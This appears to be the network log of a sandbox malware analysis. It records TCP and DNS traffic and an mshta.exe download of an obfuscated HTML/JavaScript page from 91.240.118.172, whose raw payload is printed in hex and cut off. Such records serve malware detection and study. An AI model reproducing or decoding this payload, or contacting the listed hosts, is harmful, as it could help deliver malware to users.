                                                                                                                                Jan 28, 2022 20:39:52.026103020 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026138067 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026181936 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026185989 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026206017 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026242971 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026245117 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026346922 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026370049 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026391029 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026392937 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026446104 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026494026 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026701927 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026726961 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026747942 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026767969 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026786089 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026788950 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026808023 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026828051 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026844978 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026850939 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026873112 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026890993 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026894093 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026915073 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026931047 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026933908 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026953936 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.026989937 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.026997089 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027012110 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027034044 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027050972 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027091980 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027178049 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027195930 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027223110 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027240038 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027251959 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027332067 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027367115 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027384996 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027414083 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027425051 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027430058 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027446032 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027461052 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027462006 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027493000 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027514935 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027556896 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027615070 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027630091 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027652979 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.027697086 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027724981 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.027760029 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186430931 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186469078 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186492920 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186517000 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186539888 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186561108 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186570883 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186603069 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186608076 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186613083 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186636925 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186659098 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186681032 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186683893 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186703920 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186722040 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186727047 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186748028 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186768055 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186768055 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186788082 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186808109 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186827898 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186850071 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186876059 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186885118 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186892986 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186898947 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186920881 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186943054 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186959028 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.186964989 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.186985970 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187007904 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187024117 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187030077 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187050104 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187093019 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187120914 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187159061 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187175989 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187237024 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187237024 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187294006 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187315941 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187318087 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187340975 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187360048 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187381983 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187424898 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187448978 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187488079 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187510967 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187535048 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187580109 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187601089 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187621117 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187643051 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187643051 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187665939 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187688112 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187701941 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187771082 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187793970 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187814951 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187817097 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187835932 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187870979 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.187973976 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.187995911 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188014030 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188038111 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188056946 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188126087 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188147068 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188164949 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188168049 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188184977 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188198090 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188323021 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188344955 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188363075 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188381910 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188386917 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188468933 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188508034 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188544989 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188566923 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188586950 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188606024 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188625097 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188631058 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188702106 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188724041 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188744068 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188746929 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188761950 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188800097 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188837051 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188857079 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188874960 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188899040 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.188910007 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.188977003 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189012051 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189049959 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189069986 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189088106 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189094067 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189199924 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189222097 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189241886 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189246893 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189263105 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189276934 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189382076 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189446926 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189466000 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189486027 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189491987 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.189563990 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189584017 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189603090 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:52.189608097 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:52.191306114 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:57.583878040 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:40:03.065953016 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:40:03.066056967 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:40:05.610462904 CET8049169213.186.33.4192.168.2.22
                                                                                                                                Jan 28, 2022 20:40:05.610538960 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:40:55.481875896 CET804916891.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:40:55.481980085 CET4916880192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:41:24.848200083 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:25.152870893 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:25.152957916 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:25.228030920 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:25.532659054 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:25.547328949 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:25.547360897 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:25.547503948 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:25.559819937 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:25.872416973 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:25.876492977 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:30.536216974 CET4916880192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:41:30.597696066 CET804916891.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:30.650752068 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:41:30.956254005 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:41:31.564809084 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:41:32.205137968 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:41:32.655662060 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:41:32.781565905 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:41:33.530424118 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:41:35.199760914 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:41:35.262206078 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:41:38.710087061 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:41:40.051827908 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:41:40.775181055 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:41.119858980 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:41.935688019 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:41.935882092 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:44.935729027 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:44.935753107 CET8049171160.16.102.168192.168.2.22
                                                                                                                                Jan 28, 2022 20:41:44.935843945 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:44.935899973 CET4917180192.168.2.22160.16.102.168
                                                                                                                                Jan 28, 2022 20:41:45.607197046 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:41:49.662241936 CET4916980192.168.2.22213.186.33.4

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 28, 2022 20:39:50.523480892 CET5216753192.168.2.228.8.8.8
                                                                                                                                Jan 28, 2022 20:39:50.542432070 CET53521678.8.8.8192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.694684029 CET5059153192.168.2.228.8.8.8
                                                                                                                                Jan 28, 2022 20:39:50.713618994 CET53505918.8.8.8192.168.2.22

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                Jan 28, 2022 20:39:50.523480892 CET192.168.2.228.8.8.80xfe79Standard query (0)weezual.frA (IP address)IN (0x0001)
                                                                                                                                Jan 28, 2022 20:39:50.694684029 CET192.168.2.228.8.8.80x662eStandard query (0)mycloud.suplitecmo.comA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                Jan 28, 2022 20:39:50.542432070 CET8.8.8.8192.168.2.220xfe79No error (0)weezual.fr213.186.33.4A (IP address)IN (0x0001)
                                                                                                                                Jan 28, 2022 20:39:50.713618994 CET8.8.8.8192.168.2.220x662eNo error (0)mycloud.suplitecmo.com51.81.152.36A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • 91.240.118.172
                                                                                                                                • weezual.fr
                                                                                                                                • mycloud.suplitecmo.com

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                0192.168.2.224916791.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                Jan 28, 2022 20:39:45.874831915 CET0OUTGET /cc/vv/fe.html HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US
                                                                                                                                UA-CPU: AMD64
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                Host: 91.240.118.172
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 28, 2022 20:39:45.936727047 CET2INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.20.2
                                                                                                                                Date: Fri, 28 Jan 2022 19:39:45 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                Data Raw: 32 62 34 34 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 69 38 48 77 69 34 66 35 76 36 68 61 6d 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 70 32 4e 36 31 54 36 33 34 63 47 30 76 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 70 32 4e 36 31 54 36 33 34 63 47 30 76 5b 30 5d 3d 27 67 25 37 37 25 33 35 6e 25 35 33 5c 31 37 32 25 33 32 25 37 36 27 20 20 20 3b 69 38 48 77 69 34 66 35 76 36 68 61 6d 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 76 7f 5c 5c 7f 31 7f 34 7f 31 7f 25 7f 37 7f 32 7f 25 7f 32 7f 30 7f 71 7d 1d 7f 39 7f 25 7f 33 7f 37 7d 26 7f 44 7d 20 7d 28 7f 32 7d 28 7f 33 7f 42 7d 1d 7f 31 7d 19 7f 37 7d 1c 7f 33 7f 38 7d 29 7f 53 7d 1d 7f 34 7d 06 7f 6e 7f 67 7d 20 7f 45 7d 19 7f 34 7f 36 7f 72 7f 6f 7f 6d 7f 43 7d 19 7f 35 7f 30 7f 61 7f 72 7f 43 7f 25 7f 36 7f 46 7d 41 7f 34 7f 65 7d 20 7d 37 7f 33 7d 35 7f 33 7d 20 7d 4d 7d 56 7d 26 7f 30 7d 20 7d 25 7d 2f 7f 66 7f 6f 7d 19 7f 36 7d 1f 7f 32 7d 37 7f 36 7d 5f 7d 2a 7f 33 7d 5d 7d 2f 7d 4e 7d 5f 7d 5a 7d 1f 7f 33 7f 34 7d 26 7d 2e 7d 2e 7f 42 7d 48 7d 1c 7f 32
